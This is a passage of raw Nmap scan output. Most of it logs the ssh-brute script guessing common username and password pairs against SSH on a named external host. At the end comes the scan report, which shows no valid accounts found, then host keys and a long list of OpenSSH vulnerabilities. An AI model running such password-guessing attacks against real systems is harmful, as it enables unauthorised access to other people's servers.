3327NSE: [ssh-brute] Trying username/password pair: root:666666
3328NSE: [ssh-brute] Trying username/password pair: admin:666666
3329NSE: [ssh-brute] Trying username/password pair: administrator:666666
3330NSE: [ssh-brute] Trying username/password pair: webadmin:666666
3331NSE: [ssh-brute] Trying username/password pair: sysadmin:666666
3332NSE: [ssh-brute] Trying username/password pair: netadmin:666666
3333NSE: [ssh-brute] Trying username/password pair: guest:666666
3334NSE: [ssh-brute] Trying username/password pair: user:666666
3335NSE: [ssh-brute] Trying username/password pair: web:666666
3336NSE: [ssh-brute] Trying username/password pair: test:666666
3337NSE: [ssh-brute] Trying username/password pair: root:jasmine
3338NSE: [ssh-brute] Trying username/password pair: admin:jasmine
3339NSE: [ssh-brute] Trying username/password pair: administrator:jasmine
3340NSE: [ssh-brute] Trying username/password pair: webadmin:jasmine
3341NSE: [ssh-brute] Trying username/password pair: sysadmin:jasmine
3342NSE: [ssh-brute] Trying username/password pair: netadmin:jasmine
3343NSE: [ssh-brute] Trying username/password pair: guest:jasmine
3344NSE: [ssh-brute] Trying username/password pair: user:jasmine
3345NSE: [ssh-brute] Trying username/password pair: web:jasmine
3346NSE: [ssh-brute] Trying username/password pair: test:jasmine
3347NSE: [ssh-brute] Trying username/password pair: root:lovers
3348NSE: [ssh-brute] Trying username/password pair: admin:lovers
3349NSE: [ssh-brute] Trying username/password pair: administrator:lovers
3350NSE: [ssh-brute] Trying username/password pair: webadmin:lovers
3351NSE: [ssh-brute] Trying username/password pair: sysadmin:lovers
3352NSE: [ssh-brute] Trying username/password pair: netadmin:lovers
3353NSE: [ssh-brute] Trying username/password pair: guest:lovers
3354NSE: [ssh-brute] Trying username/password pair: user:lovers
3355NSE: [ssh-brute] Trying username/password pair: web:lovers
3356NSE: [ssh-brute] Trying username/password pair: test:lovers
3357NSE: [ssh-brute] Trying username/password pair: root:brandon
3358NSE: [ssh-brute] Trying username/password pair: admin:brandon
3359NSE: [ssh-brute] Trying username/password pair: administrator:brandon
3360NSE: [ssh-brute] Trying username/password pair: webadmin:brandon
3361NSE: [ssh-brute] Trying username/password pair: sysadmin:brandon
3362NSE: [ssh-brute] Trying username/password pair: netadmin:brandon
3363NSE: [ssh-brute] Trying username/password pair: guest:brandon
3364NSE: [ssh-brute] Trying username/password pair: user:brandon
3365NSE: [ssh-brute] Trying username/password pair: web:brandon
3366NSE: [ssh-brute] Trying username/password pair: test:brandon
3367NSE: [ssh-brute] Trying username/password pair: root:teamo
3368NSE: [ssh-brute] Trying username/password pair: admin:teamo
3369NSE: [ssh-brute] Trying username/password pair: administrator:teamo
3370NSE: [ssh-brute] Trying username/password pair: webadmin:teamo
3371NSE: [ssh-brute] Trying username/password pair: sysadmin:teamo
3372NSE: [ssh-brute] Trying username/password pair: netadmin:teamo
3373NSE: [ssh-brute] Trying username/password pair: guest:teamo
3374NSE: [ssh-brute] Trying username/password pair: user:teamo
3375NSE: [ssh-brute] Trying username/password pair: web:teamo
3376NSE: [ssh-brute] Trying username/password pair: test:teamo
3377NSE: [ssh-brute] Trying username/password pair: root:matthew
3378NSE: [ssh-brute] Trying username/password pair: admin:matthew
3379NSE: [ssh-brute] Trying username/password pair: administrator:matthew
3380NSE: [ssh-brute] Trying username/password pair: webadmin:matthew
3381NSE: [ssh-brute] Trying username/password pair: sysadmin:matthew
3382NSE: [ssh-brute] Trying username/password pair: netadmin:matthew
3383NSE: [ssh-brute] Trying username/password pair: guest:matthew
3384NSE: [ssh-brute] Trying username/password pair: user:matthew
3385NSE: [ssh-brute] Trying username/password pair: web:matthew
3386NSE: [ssh-brute] Trying username/password pair: test:matthew
3387NSE: [ssh-brute] Trying username/password pair: root:melissa
3388NSE: [ssh-brute] Trying username/password pair: admin:melissa
3389NSE: [ssh-brute] Trying username/password pair: administrator:melissa
3390NSE: [ssh-brute] Trying username/password pair: webadmin:melissa
3391NSE: [ssh-brute] Trying username/password pair: sysadmin:melissa
3392NSE: [ssh-brute] Trying username/password pair: netadmin:melissa
3393NSE: [ssh-brute] Trying username/password pair: guest:melissa
3394NSE: [ssh-brute] Trying username/password pair: user:melissa
3395NSE: [ssh-brute] Trying username/password pair: web:melissa
3396NSE: [ssh-brute] Trying username/password pair: test:melissa
3397NSE: [ssh-brute] Trying username/password pair: root:eminem
3398NSE: [ssh-brute] Trying username/password pair: admin:eminem
3399NSE: [ssh-brute] Trying username/password pair: administrator:eminem
3400NSE: [ssh-brute] Trying username/password pair: webadmin:eminem
3401NSE: [ssh-brute] Trying username/password pair: sysadmin:eminem
3402NSE: [ssh-brute] Trying username/password pair: netadmin:eminem
3403NSE: [ssh-brute] Trying username/password pair: guest:eminem
3404NSE: [ssh-brute] Trying username/password pair: user:eminem
3405NSE: [ssh-brute] Trying username/password pair: web:eminem
3406NSE: [ssh-brute] Trying username/password pair: test:eminem
3407NSE: [ssh-brute] Trying username/password pair: root:robert
3408NSE: [ssh-brute] Trying username/password pair: admin:robert
3409NSE: [ssh-brute] Trying username/password pair: administrator:robert
3410NSE: [ssh-brute] Trying username/password pair: webadmin:robert
3411NSE: [ssh-brute] Trying username/password pair: sysadmin:robert
3412NSE: [ssh-brute] Trying username/password pair: netadmin:robert
3413NSE: [ssh-brute] Trying username/password pair: guest:robert
3414NSE: [ssh-brute] Trying username/password pair: user:robert
3415NSE: [ssh-brute] Trying username/password pair: web:robert
3416NSE: [ssh-brute] Trying username/password pair: test:robert
3417NSE: [ssh-brute] Trying username/password pair: root:danielle
3418NSE: [ssh-brute] Trying username/password pair: admin:danielle
3419NSE: [ssh-brute] Trying username/password pair: administrator:danielle
3420NSE: [ssh-brute] Trying username/password pair: webadmin:danielle
3421NSE: [ssh-brute] Trying username/password pair: sysadmin:danielle
3422NSE: [ssh-brute] Trying username/password pair: netadmin:danielle
3423NSE: [ssh-brute] Trying username/password pair: guest:danielle
3424NSE: [ssh-brute] Trying username/password pair: user:danielle
3425NSE: [ssh-brute] Trying username/password pair: web:danielle
3426NSE: [ssh-brute] Trying username/password pair: test:danielle
3427NSE: [ssh-brute] Trying username/password pair: root:forever
3428NSE: [ssh-brute] Trying username/password pair: admin:forever
3429NSE: [ssh-brute] Trying username/password pair: administrator:forever
3430NSE: [ssh-brute] Trying username/password pair: webadmin:forever
3431NSE: [ssh-brute] Trying username/password pair: sysadmin:forever
3432NSE: [ssh-brute] Trying username/password pair: netadmin:forever
3433NSE: [ssh-brute] Trying username/password pair: guest:forever
3434NSE: [ssh-brute] Trying username/password pair: user:forever
3435NSE: [ssh-brute] Trying username/password pair: web:forever
3436NSE: [ssh-brute] Trying username/password pair: test:forever
3437NSE: [ssh-brute] Trying username/password pair: root:dragon
3438NSE: [ssh-brute] Trying username/password pair: admin:dragon
3439NSE: [ssh-brute] Trying username/password pair: administrator:dragon
3440NSE: [ssh-brute] Trying username/password pair: webadmin:dragon
3441NSE: [ssh-brute] Trying username/password pair: sysadmin:dragon
3442NSE: [ssh-brute] Trying username/password pair: netadmin:dragon
3443NSE: [ssh-brute] Trying username/password pair: guest:dragon
3444NSE: [ssh-brute] Trying username/password pair: user:dragon
3445NSE: [ssh-brute] Trying username/password pair: web:dragon
3446NSE: [ssh-brute] Trying username/password pair: test:dragon
3447NSE: [ssh-brute] Trying username/password pair: root:computer
3448NSE: [ssh-brute] Trying username/password pair: admin:computer
3449NSE: [ssh-brute] Trying username/password pair: administrator:computer
3450NSE: [ssh-brute] Trying username/password pair: webadmin:computer
3451NSE: [ssh-brute] Trying username/password pair: sysadmin:computer
3452NSE: [ssh-brute] Trying username/password pair: netadmin:computer
3453NSE: [ssh-brute] Trying username/password pair: guest:computer
3454NSE: [ssh-brute] Trying username/password pair: user:computer
3455NSE: [ssh-brute] Trying username/password pair: web:computer
3456NSE: [ssh-brute] Trying username/password pair: test:computer
3457NSE: [ssh-brute] Trying username/password pair: root:whatever
3458NSE: [ssh-brute] Trying username/password pair: admin:whatever
3459NSE: [ssh-brute] Trying username/password pair: administrator:whatever
3460NSE: [ssh-brute] Trying username/password pair: webadmin:whatever
3461NSE: [ssh-brute] Trying username/password pair: sysadmin:whatever
3462NSE: [ssh-brute] Trying username/password pair: netadmin:whatever
3463NSE: [ssh-brute] Trying username/password pair: guest:whatever
3464NSE: [ssh-brute] Trying username/password pair: user:whatever
3465NSE: [ssh-brute] Trying username/password pair: web:whatever
3466NSE: [ssh-brute] Trying username/password pair: test:whatever
3467NSE: [ssh-brute] Trying username/password pair: root:family
3468NSE: [ssh-brute] Trying username/password pair: admin:family
3469NSE: [ssh-brute] Trying username/password pair: administrator:family
3470NSE: [ssh-brute] Trying username/password pair: webadmin:family
3471NSE: [ssh-brute] Trying username/password pair: sysadmin:family
3472NSE: [ssh-brute] Trying username/password pair: netadmin:family
3473NSE: [ssh-brute] Trying username/password pair: guest:family
3474NSE: [ssh-brute] Trying username/password pair: user:family
3475NSE: [ssh-brute] Trying username/password pair: web:family
3476NSE: [ssh-brute] Trying username/password pair: test:family
3477NSE: [ssh-brute] Trying username/password pair: root:jonathan
3478NSE: [ssh-brute] Trying username/password pair: admin:jonathan
3479NSE: [ssh-brute] Trying username/password pair: administrator:jonathan
3480NSE: [ssh-brute] Trying username/password pair: webadmin:jonathan
3481NSE: [ssh-brute] Trying username/password pair: sysadmin:jonathan
3482NSE: [ssh-brute] Trying username/password pair: netadmin:jonathan
3483NSE: [ssh-brute] Trying username/password pair: guest:jonathan
3484NSE: [ssh-brute] Trying username/password pair: user:jonathan
3485NSE: [ssh-brute] Trying username/password pair: web:jonathan
3486NSE: [ssh-brute] Trying username/password pair: test:jonathan
3487NSE: [ssh-brute] Trying username/password pair: root:cookie
3488NSE: [ssh-brute] Trying username/password pair: admin:cookie
3489NSE: [ssh-brute] Trying username/password pair: administrator:cookie
3490NSE: [ssh-brute] Trying username/password pair: webadmin:cookie
3491NSE: [ssh-brute] Trying username/password pair: sysadmin:cookie
3492NSE: [ssh-brute] Trying username/password pair: netadmin:cookie
3493NSE: [ssh-brute] Trying username/password pair: guest:cookie
3494NSE: [ssh-brute] Trying username/password pair: user:cookie
3495NSE: [ssh-brute] Trying username/password pair: web:cookie
3496NSE: [ssh-brute] Trying username/password pair: test:cookie
3497NSE: [ssh-brute] Trying username/password pair: root:summer
3498NSE: [ssh-brute] Trying username/password pair: admin:summer
3499NSE: [ssh-brute] Trying username/password pair: administrator:summer
3500NSE: [ssh-brute] Trying username/password pair: webadmin:summer
3501NSE: [ssh-brute] Trying username/password pair: sysadmin:summer
3502NSE: [ssh-brute] Trying username/password pair: netadmin:summer
3503NSE: [ssh-brute] Trying username/password pair: guest:summer
3504NSE: [ssh-brute] Trying username/password pair: user:summer
3505NSE: [ssh-brute] Trying username/password pair: web:summer
3506NSE: [ssh-brute] Trying username/password pair: test:summer
3507NSE: [ssh-brute] Trying username/password pair: root:987654321
3508NSE: [ssh-brute] Trying username/password pair: admin:987654321
3509NSE: [ssh-brute] Trying username/password pair: administrator:987654321
3510NSE: [ssh-brute] Trying username/password pair: webadmin:987654321
3511NSE: [ssh-brute] Trying username/password pair: sysadmin:987654321
3512NSE: [ssh-brute] Trying username/password pair: netadmin:987654321
3513NSE: [ssh-brute] Trying username/password pair: guest:987654321
3514NSE: [ssh-brute] Trying username/password pair: user:987654321
3515NSE: [ssh-brute] Trying username/password pair: web:987654321
3516NSE: [ssh-brute] Trying username/password pair: test:987654321
3517NSE: [ssh-brute] Trying username/password pair: root:naruto
3518NSE: [ssh-brute] Trying username/password pair: admin:naruto
3519NSE: [ssh-brute] Trying username/password pair: administrator:naruto
3520NSE: [ssh-brute] Trying username/password pair: webadmin:naruto
3521NSE: [ssh-brute] Trying username/password pair: sysadmin:naruto
3522NSE: [ssh-brute] Trying username/password pair: netadmin:naruto
3523NSE: [ssh-brute] Trying username/password pair: guest:naruto
3524NSE: [ssh-brute] Trying username/password pair: user:naruto
3525NSE: [ssh-brute] Trying username/password pair: web:naruto
3526NSE: [ssh-brute] Trying username/password pair: test:naruto
3527NSE: [ssh-brute] Trying username/password pair: root:vanessa
3528NSE: [ssh-brute] Trying username/password pair: admin:vanessa
3529NSE: [ssh-brute] Trying username/password pair: administrator:vanessa
3530NSE: [ssh-brute] Trying username/password pair: webadmin:vanessa
3531NSE: [ssh-brute] Trying username/password pair: sysadmin:vanessa
3532NSE: [ssh-brute] Trying username/password pair: netadmin:vanessa
3533NSE: [ssh-brute] Trying username/password pair: guest:vanessa
3534NSE: [ssh-brute] Trying username/password pair: user:vanessa
3535NSE: [ssh-brute] Trying username/password pair: web:vanessa
3536NSE: [ssh-brute] Trying username/password pair: test:vanessa
3537NSE: [ssh-brute] Trying username/password pair: root:sweety
3538NSE: [ssh-brute] Trying username/password pair: admin:sweety
3539NSE: [ssh-brute] Trying username/password pair: administrator:sweety
3540NSE: [ssh-brute] Trying username/password pair: webadmin:sweety
3541NSE: [ssh-brute] Trying username/password pair: sysadmin:sweety
3542NSE: [ssh-brute] Trying username/password pair: netadmin:sweety
3543NSE: [ssh-brute] Trying username/password pair: guest:sweety
3544NSE: [ssh-brute] Trying username/password pair: user:sweety
3545NSE: [ssh-brute] Trying username/password pair: web:sweety
3546NSE: [ssh-brute] Trying username/password pair: test:sweety
3547NSE: [ssh-brute] Trying username/password pair: root:joseph
3548NSE: [ssh-brute] Trying username/password pair: admin:joseph
3549NSE: [ssh-brute] Trying username/password pair: administrator:joseph
3550NSE: [ssh-brute] Trying username/password pair: webadmin:joseph
3551NSE: [ssh-brute] Trying username/password pair: sysadmin:joseph
3552NSE: [ssh-brute] Trying username/password pair: netadmin:joseph
3553NSE: [ssh-brute] Trying username/password pair: guest:joseph
3554NSE: [ssh-brute] Trying username/password pair: user:joseph
3555NSE: [ssh-brute] Trying username/password pair: web:joseph
3556NSE: [ssh-brute] Trying username/password pair: test:joseph
3557NSE: [ssh-brute] Trying username/password pair: root:spongebob
3558NSE: [ssh-brute] Trying username/password pair: admin:spongebob
3559NSE: [ssh-brute] Trying username/password pair: administrator:spongebob
3560NSE: [ssh-brute] Trying username/password pair: webadmin:spongebob
3561NSE: [ssh-brute] Trying username/password pair: sysadmin:spongebob
3562NSE: [ssh-brute] Trying username/password pair: netadmin:spongebob
3563NSE: [ssh-brute] Trying username/password pair: guest:spongebob
3564NSE: [ssh-brute] Trying username/password pair: user:spongebob
3565NSE: [ssh-brute] Trying username/password pair: web:spongebob
3566NSE: [ssh-brute] Trying username/password pair: test:spongebob
3567NSE: [ssh-brute] Trying username/password pair: root:junior
3568NSE: [ssh-brute] Trying username/password pair: admin:junior
3569NSE: [ssh-brute] Trying username/password pair: administrator:junior
3570NSE: [ssh-brute] Trying username/password pair: webadmin:junior
3571NSE: [ssh-brute] Trying username/password pair: sysadmin:junior
3572NSE: [ssh-brute] Trying username/password pair: netadmin:junior
3573NSE: [ssh-brute] Trying username/password pair: guest:junior
3574NSE: [ssh-brute] Trying username/password pair: user:junior
3575NSE: [ssh-brute] Trying username/password pair: web:junior
3576NSE: [ssh-brute] Trying username/password pair: test:junior
3577NSE: [ssh-brute] Trying username/password pair: root:taylor
3578NSE: [ssh-brute] Trying username/password pair: admin:taylor
3579NSE: [ssh-brute] Trying username/password pair: administrator:taylor
3580NSE: [ssh-brute] Trying username/password pair: webadmin:taylor
3581NSE: [ssh-brute] Trying username/password pair: sysadmin:taylor
3582NSE: [ssh-brute] Trying username/password pair: netadmin:taylor
3583NSE: [ssh-brute] Trying username/password pair: guest:taylor
3584NSE: [ssh-brute] Trying username/password pair: user:taylor
3585NSE: [ssh-brute] Trying username/password pair: web:taylor
3586NSE: [ssh-brute] Trying username/password pair: test:taylor
3587NSE: [ssh-brute] Trying username/password pair: root:softball
3588NSE: [ssh-brute] Trying username/password pair: admin:softball
3589NSE: [ssh-brute] Trying username/password pair: administrator:softball
3590NSE: [ssh-brute] Trying username/password pair: webadmin:softball
3591NSE: [ssh-brute] Trying username/password pair: sysadmin:softball
3592NSE: [ssh-brute] Trying username/password pair: netadmin:softball
3593NSE: [ssh-brute] Trying username/password pair: guest:softball
3594NSE: [ssh-brute] Trying username/password pair: user:softball
3595NSE: [ssh-brute] Trying username/password pair: web:softball
3596NSE: [ssh-brute] Trying username/password pair: test:softball
3597NSE: [ssh-brute] Trying username/password pair: root:mickey
3598NSE: [ssh-brute] Trying username/password pair: admin:mickey
3599NSE: [ssh-brute] Trying username/password pair: administrator:mickey
3600NSE: [ssh-brute] Trying username/password pair: webadmin:mickey
3601NSE: [ssh-brute] Trying username/password pair: sysadmin:mickey
3602NSE: [ssh-brute] Trying username/password pair: netadmin:mickey
3603NSE: [ssh-brute] Trying username/password pair: guest:mickey
3604NSE: [ssh-brute] Trying username/password pair: user:mickey
3605NSE: [ssh-brute] Trying username/password pair: web:mickey
3606NSE: [ssh-brute] Trying username/password pair: test:mickey
3607NSE: [ssh-brute] Trying username/password pair: root:yellow
3608NSE: [ssh-brute] Trying username/password pair: admin:yellow
3609NSE: [ssh-brute] Trying username/password pair: administrator:yellow
3610NSE: [ssh-brute] Trying username/password pair: webadmin:yellow
3611NSE: [ssh-brute] Trying username/password pair: sysadmin:yellow
3612NSE: [ssh-brute] Trying username/password pair: netadmin:yellow
3613NSE: [ssh-brute] Trying username/password pair: guest:yellow
3614NSE: [ssh-brute] Trying username/password pair: user:yellow
3615NSE: [ssh-brute] Trying username/password pair: web:yellow
3616NSE: [ssh-brute] Trying username/password pair: test:yellow
3617NSE: [ssh-brute] Trying username/password pair: root:lauren
3618NSE: [ssh-brute] Trying username/password pair: admin:lauren
3619NSE: [ssh-brute] Trying username/password pair: administrator:lauren
3620NSE: [ssh-brute] Trying username/password pair: webadmin:lauren
3621NSE: [ssh-brute] Trying username/password pair: sysadmin:lauren
3622NSE: [ssh-brute] Trying username/password pair: netadmin:lauren
3623NSE: [ssh-brute] Trying username/password pair: guest:lauren
3624NSE: [ssh-brute] Trying username/password pair: user:lauren
3625NSE: [ssh-brute] Trying username/password pair: web:lauren
3626NSE: [ssh-brute] Trying username/password pair: test:lauren
3627NSE: [ssh-brute] Trying username/password pair: root:daniela
3628NSE: [ssh-brute] Trying username/password pair: admin:daniela
3629NSE: [ssh-brute] Trying username/password pair: administrator:daniela
3630NSE: [ssh-brute] Trying username/password pair: webadmin:daniela
3631NSE: [ssh-brute] Trying username/password pair: sysadmin:daniela
3632NSE: [ssh-brute] Trying username/password pair: netadmin:daniela
3633NSE: [ssh-brute] Trying username/password pair: guest:daniela
3634NSE: [ssh-brute] Trying username/password pair: user:daniela
3635NSE: [ssh-brute] Trying username/password pair: web:daniela
3636NSE: [ssh-brute] Trying username/password pair: test:daniela
3637NSE: [ssh-brute] Trying username/password pair: root:princesa
3638NSE: [ssh-brute] Trying username/password pair: admin:princesa
3639NSE: [ssh-brute] Trying username/password pair: administrator:princesa
3640NSE: [ssh-brute] Trying username/password pair: webadmin:princesa
3641NSE: [ssh-brute] Trying username/password pair: sysadmin:princesa
3642NSE: [ssh-brute] Trying username/password pair: netadmin:princesa
3643NSE: [ssh-brute] Trying username/password pair: guest:princesa
3644NSE: [ssh-brute] Trying username/password pair: user:princesa
3645NSE: [ssh-brute] Trying username/password pair: web:princesa
3646NSE: [ssh-brute] Trying username/password pair: test:princesa
3647NSE: [ssh-brute] Trying username/password pair: root:william
3648NSE: [ssh-brute] Trying username/password pair: admin:william
3649NSE: [ssh-brute] Trying username/password pair: administrator:william
3650NSE: [ssh-brute] Trying username/password pair: webadmin:william
3651NSE: [ssh-brute] Trying username/password pair: sysadmin:william
3652NSE: [ssh-brute] Trying username/password pair: netadmin:william
3653NSE: [ssh-brute] Trying username/password pair: guest:william
3654NSE: [ssh-brute] Trying username/password pair: user:william
3655NSE: [ssh-brute] Trying username/password pair: web:william
3656NSE: [ssh-brute] Trying username/password pair: test:william
3657NSE: [ssh-brute] Trying username/password pair: root:alexandra
3658NSE: [ssh-brute] Trying username/password pair: admin:alexandra
3659NSE: [ssh-brute] Trying username/password pair: administrator:alexandra
3660NSE: [ssh-brute] Trying username/password pair: webadmin:alexandra
3661NSE: [ssh-brute] Trying username/password pair: sysadmin:alexandra
3662NSE: [ssh-brute] Trying username/password pair: netadmin:alexandra
3663NSE: [ssh-brute] Trying username/password pair: guest:alexandra
3664NSE: [ssh-brute] Trying username/password pair: user:alexandra
3665NSE: [ssh-brute] Trying username/password pair: web:alexandra
3666NSE: [ssh-brute] Trying username/password pair: test:alexandra
3667NSE: [ssh-brute] Trying username/password pair: root:thomas
3668NSE: [ssh-brute] Trying username/password pair: admin:thomas
3669NSE: [ssh-brute] Trying username/password pair: administrator:thomas
3670NSE: [ssh-brute] Trying username/password pair: webadmin:thomas
3671NSE: [ssh-brute] Trying username/password pair: sysadmin:thomas
3672NSE: [ssh-brute] Trying username/password pair: netadmin:thomas
3673NSE: [ssh-brute] Trying username/password pair: guest:thomas
3674NSE: [ssh-brute] Trying username/password pair: user:thomas
3675NSE: [ssh-brute] Trying username/password pair: web:thomas
3676NSE: [ssh-brute] Trying username/password pair: test:thomas
3677NSE: [ssh-brute] Trying username/password pair: root:jesus
3678NSE: [ssh-brute] Trying username/password pair: admin:jesus
3679NSE: [ssh-brute] Trying username/password pair: administrator:jesus
3680NSE: [ssh-brute] Trying username/password pair: webadmin:jesus
3681NSE: [ssh-brute] Trying username/password pair: sysadmin:jesus
3682NSE: [ssh-brute] Trying username/password pair: netadmin:jesus
3683NSE: [ssh-brute] Trying username/password pair: guest:jesus
3684NSE: [ssh-brute] Trying username/password pair: user:jesus
3685NSE: [ssh-brute] Trying username/password pair: web:jesus
3686NSE: [ssh-brute] Trying username/password pair: test:jesus
3687NSE: [ssh-brute] Trying username/password pair: root:alexis
3688NSE: [ssh-brute] Trying username/password pair: admin:alexis
3689NSE: [ssh-brute] Trying username/password pair: administrator:alexis
3690NSE: [ssh-brute] Trying username/password pair: webadmin:alexis
3691NSE: [ssh-brute] Trying username/password pair: sysadmin:alexis
3692NSE: [ssh-brute] Trying username/password pair: netadmin:alexis
3693NSE: [ssh-brute] Trying username/password pair: guest:alexis
3694NSE: [ssh-brute] Trying username/password pair: user:alexis
3695NSE: [ssh-brute] Trying username/password pair: web:alexis
3696NSE: [ssh-brute] Trying username/password pair: test:alexis
3697NSE: [ssh-brute] Trying username/password pair: root:miguel
3698NSE: [ssh-brute] Trying username/password pair: admin:miguel
3699NSE: [ssh-brute] Trying username/password pair: administrator:miguel
3700NSE: [ssh-brute] Trying username/password pair: webadmin:miguel
3701NSE: [ssh-brute] Trying username/password pair: sysadmin:miguel
3702NSE: [ssh-brute] Trying username/password pair: netadmin:miguel
3703NSE: [ssh-brute] Trying username/password pair: guest:miguel
3704NSE: [ssh-brute] Trying username/password pair: user:miguel
3705NSE: [ssh-brute] Trying username/password pair: web:miguel
3706NSE: [ssh-brute] Trying username/password pair: test:miguel
3707NSE: [ssh-brute] Trying username/password pair: root:estrella
3708NSE: [ssh-brute] Trying username/password pair: admin:estrella
3709NSE: [ssh-brute] Trying username/password pair: administrator:estrella
3710NSE: [ssh-brute] Trying username/password pair: webadmin:estrella
3711NSE: [ssh-brute] Trying username/password pair: sysadmin:estrella
3712NSE: [ssh-brute] Trying username/password pair: netadmin:estrella
3713NSE: [ssh-brute] Trying username/password pair: guest:estrella
3714NSE: [ssh-brute] Trying username/password pair: user:estrella
3715NSE: [ssh-brute] Trying username/password pair: web:estrella
3716NSE: [ssh-brute] Trying username/password pair: test:estrella
3717NSE: [ssh-brute] Trying username/password pair: root:patrick
3718NSE: [ssh-brute] Trying username/password pair: admin:patrick
3719NSE: [ssh-brute] Trying username/password pair: administrator:patrick
3720NSE: [ssh-brute] Trying username/password pair: webadmin:patrick
3721NSE: [ssh-brute] Trying username/password pair: sysadmin:patrick
3722NSE: [ssh-brute] Trying username/password pair: netadmin:patrick
3723NSE: [ssh-brute] usernames: Time limit 10m00s exceeded.
3724NSE: [ssh-brute] usernames: Time limit 10m00s exceeded.
3725NSE: [ssh-brute] passwords: Time limit 10m00s exceeded.
3726Nmap scan report for www.gpdg.org (92.39.247.11)
3727Host is up (0.19s latency).
3728rDNS record for 92.39.247.11: vps2330-cloud.sd-france.net
3729
3730PORT STATE SERVICE VERSION
373122/tcp open ssh OpenSSH 7.4 (protocol 2.0)
3732| ssh-auth-methods:
3733| Supported authentication methods:
3734| publickey
3735| gssapi-keyex
3736| gssapi-with-mic
3737|_ password
3738| ssh-brute:
3739| Accounts: No valid accounts found
3740|_ Statistics: Performed 1086 guesses in 601 seconds, average tps: 2.1
3741| ssh-hostkey:
3742| 2048 99:10:45:08:e5:db:22:bc:1d:6c:f1:a7:67:87:93:a7 (RSA)
3743| 256 9a:f2:bd:9d:64:f8:4a:d8:5a:5a:9e:60:bd:45:a4:f0 (ECDSA)
3744|_ 256 e1:38:2c:40:af:ec:e0:74:ea:a1:f1:61:b1:b5:ec:83 (ED25519)
3745| ssh-publickey-acceptance:
3746|_ Accepted Public Keys: No public keys accepted
3747|_ssh-run: Failed to specify credentials and command to run.
3748| vulners:
3749| cpe:/a:openbsd:openssh:7.4:
3750| CVE-2018-15919 5.0 https://vulners.com/cve/CVE-2018-15919
3751|_ CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
3752| vulscan: VulDB - https://vuldb.com:
3753| [130671] gsi-openssh-server 7.9p1 on Fedora /etc/gsissh/sshd_config weak authentication
3754| [130371] OpenSSH 7.9 scp Man-in-the-Middle directory traversal
3755| [130370] OpenSSH 7.9 Man-in-the-Middle spoofing
3756| [130369] OpenSSH 7.9 Encoding progressmeter.c refresh_progress_meter() spoofing
3757| [129007] OpenSSH 7.9 scp Client scp.c Filename privilege escalation
3758| [123343] OpenSSH up to 7.8 GSS2 auth-gss2.c information disclosure
3759| [123011] OpenSSH up to 7.7 auth2-gss.c Request information disclosure
3760| [112267] OpenSSH up to 7.3 sshd kex.c/packet.c NEWKEYS Message denial of service
3761| [108627] OpenSSH up to 7.5 Readonly Mode sftp-server.c process_open unknown vulnerability
3762| [94611] OpenSSH up to 7.3 Access Control privilege escalation
3763| [94610] OpenSSH up to 7.3 Shared Memory Manager privilege escalation
3764| [94608] OpenSSH up to 7.3 Unix-Domain Socket privilege escalation
3765| [94607] OpenSSH up to 7.3 Forwarded Agent Channel privilege escalation
3766| [90671] OpenSSH up to 7.2 auth-passwd.c auth_password denial of service
3767| [90405] OpenSSH up to 7.2p2 sshd information disclosure
3768| [90404] OpenSSH up to 7.2p2 sshd information disclosure
3769| [90403] OpenSSH up to 7.2p2 sshd CPU Exhaustion denial of service
3770| [89622] OpenSSH 7.2p2 Authentication Username information disclosure
3771| [81320] OpenSSH up to 7.2p1 X11 Authentication Credential xauth privilege escalation
3772| [80656] OpenBSD OpenSSH 7.1 X11 Forwarding privilege escalation
3773| [80330] OpenSSH up to 7.1p1 packet.c ssh_packet_read_poll2 memory corruption
3774|
3775| MITRE CVE - https://cve.mitre.org:
3776| [CVE-2010-4755] The (1) remote_glob function in sftp-glob.c and the (2) process_put function in sftp.c in OpenSSH 5.8 and earlier, as used in FreeBSD 7.3 and 8.1, NetBSD 5.0.2, OpenBSD 4.7, and other products, allow remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in SSH_FXP_STAT requests to an sftp daemon, a different vulnerability than CVE-2010-2632.
3777| [CVE-1999-0661] A system is running a version of software that was replaced with a Trojan Horse at one of its distribution points, such as (1) TCP Wrappers 7.6, (2) util-linux 2.9g, (3) wuarchive ftpd (wuftpd) 2.2 and 2.1f, (4) IRC client (ircII) ircII 2.2.9, (5) OpenSSH 3.4p1, or (6) Sendmail 8.12.6.
3778|
3779| SecurityFocus - https://www.securityfocus.com/bid/:
3780| [102780] OpenSSH CVE-2016-10708 Multiple Denial of Service Vulnerabilities
3781| [101552] OpenSSH 'sftp-server.c' Remote Security Bypass Vulnerability
3782| [94977] OpenSSH CVE-2016-10011 Local Information Disclosure Vulnerability
3783| [94975] OpenSSH CVE-2016-10012 Security Bypass Vulnerability
3784| [94972] OpenSSH CVE-2016-10010 Privilege Escalation Vulnerability
3785| [94968] OpenSSH CVE-2016-10009 Remote Code Execution Vulnerability
3786| [93776] OpenSSH 'ssh/kex.c' Denial of Service Vulnerability
3787| [92212] OpenSSH CVE-2016-6515 Denial of Service Vulnerability
3788| [92210] OpenSSH CBC Padding Weak Encryption Security Weakness
3789| [92209] OpenSSH MAC Verification Security Bypass Vulnerability
3790| [91812] OpenSSH CVE-2016-6210 User Enumeration Vulnerability
3791| [90440] OpenSSH CVE-2004-1653 Remote Security Vulnerability
3792| [90340] OpenSSH CVE-2004-2760 Remote Security Vulnerability
3793| [89385] OpenSSH CVE-2005-2666 Local Security Vulnerability
3794| [88655] OpenSSH CVE-2001-1382 Remote Security Vulnerability
3795| [88513] OpenSSH CVE-2000-0999 Remote Security Vulnerability
3796| [88367] OpenSSH CVE-1999-1010 Local Security Vulnerability
3797| [87789] OpenSSH CVE-2003-0682 Remote Security Vulnerability
3798| [86187] OpenSSH 'session.c' Local Security Bypass Vulnerability
3799| [86144] OpenSSH CVE-2007-2768 Remote Security Vulnerability
3800| [84427] OpenSSH CVE-2016-1908 Security Bypass Vulnerability
3801| [84314] OpenSSH CVE-2016-3115 Remote Command Injection Vulnerability
3802| [84185] OpenSSH CVE-2006-4925 Denial-Of-Service Vulnerability
3803| [81293] OpenSSH CVE-2016-1907 Denial of Service Vulnerability
3804| [80698] OpenSSH CVE-2016-0778 Heap Based Buffer Overflow Vulnerability
3805| [80695] OpenSSH CVE-2016-0777 Information Disclosure Vulnerability
3806| [76497] OpenSSH CVE-2015-6565 Local Security Bypass Vulnerability
3807| [76317] OpenSSH PAM Support Multiple Remote Code Execution Vulnerabilities
